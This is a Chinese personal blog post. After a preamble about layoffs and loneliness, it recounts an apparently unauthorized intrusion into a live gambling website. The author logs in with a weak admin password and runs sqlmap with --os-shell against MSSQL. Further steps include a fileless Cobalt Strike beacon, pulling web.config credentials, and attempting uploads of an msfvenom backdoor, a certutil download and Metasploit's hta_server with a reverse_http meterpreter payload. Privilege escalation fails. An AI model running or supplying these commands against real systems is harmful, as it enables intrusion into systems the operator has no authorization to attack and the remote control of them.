题外话

转眼之间已经来到了2025年马上就过年了，距离上次在fb发表文章已经快5年了，上次本想写一个系列结果半途而废（甚至都不能说是半途，应该叫开局而废更合适- -！）。最近突然想写点什么，又没有公众号于是又想起了fb。

口罩三年之后发生了很多事：

• 公司裁员、降薪、削福利、继续裁员，虽然目前还没有轮到我，但应该也是早晚得事。自己也有要换工作的想法，但是一直没下定决心。
• 缅A更是一言难尽，唉
• 更扎心的是喜欢的人突然找到了另一半。本来正常情况下既然人家已经有了另一半就应该默默离开才是，可偏偏又是同一个公司的，低头不见抬头见，或许喜欢她从一开始就是一种错误吧~
• 每次给家里联系都是三件事：找对象、找对象、还是找对象

白天还好投入到工作中不会想那么多。到了晚上下班之后自己一个人呆在屋子里才是最难受的，于是拼命的找事做，打游戏、看电影、追剧、看课程......等这些都腻了的时候就有了这次不成功的渗透......

正文

cs上线

某菠菜站

尝试弱口令，没费什么力气admin/123456，管理员安全意识应该不高

啊，这应该都是测试数据吧？？？

后台没什么可以利用的地方，但是这个菠菜站模板登录是有sql注入（本站就有文章），直接sqlmap梭哈

sqlmap -r sql.txt

确认有sql注入，都已经进后台了数据就不看了，直接加--os-shell参数

sqlmap -r sql.txt --dbms mssql --os-shell

使用cs进行无文件上线，也是参考的本站文章

在os-shell中执行这行命令

看下系统信息，某云的

没域

看下文件

先把Web.config下载下来，可能有用…

提权（失败）

尝试了cs上自带的提权方式全部以失败告终，补丁打的挺全......

web.config里有数据库sa的密码但提权也失败了。

到这就想着放到msf里去碰碰运气（这里好像能直接把cs会话派生给msf，但是没用过所以决定还是用传统的姿势）。

通过在线识别先看下进程里有没有杀软之类的

在网上搜了一下，应该是没影响

msfvenom生成后门上传

看着是传成功了也没报错，难道是被杀了？

在随便传点东西，还是0

看来是不让传，但是也没个错误提示

再尝试用certutil下载远程文件

磁盘空间肯定是够的，但是下载不了，应该是策略或权限问题。

后来查资料发现msf也是可以支持无落地文件上线的

use exploit/windows/misc/hta_server

set payload windows/meterpreter/reverse_http

set lhost ip

set lport

exploit –j

会生成一个链接地址使用mshta访问

本次渗透到这其实已经结束了，msf自带模块测了一遍也是提权失败，溜了溜了，提不动。都是失败的就不做记录了。

总结

1. 目标web突破很简单，毕竟有现成的漏洞。
2. 关于文件的上传和下载的限制目标可以使用无落地文件攻击(后来又试了一下直接写文件也是可以的)。
3. 关于windows的提权，太菜了，还得练。
4. 这个目标其实还能继续折腾一下，nmap也扫出来了一些别的服务，文件那块也没有仔细去翻。但是没心思搞了，太累了，白天上班晚上还要弄这，东西虽然不多但是折腾来折腾去在加上写这篇文章也用了差不多3个晚上。
5. 本人全职不是搞渗透的，所以技术难免有所不足，对于不足的地方希望各位大佬能提点提点。

参考

https://www.freebuf.com/articles/network/250744.html

https://cloud.tencent.com/developer/article/1802231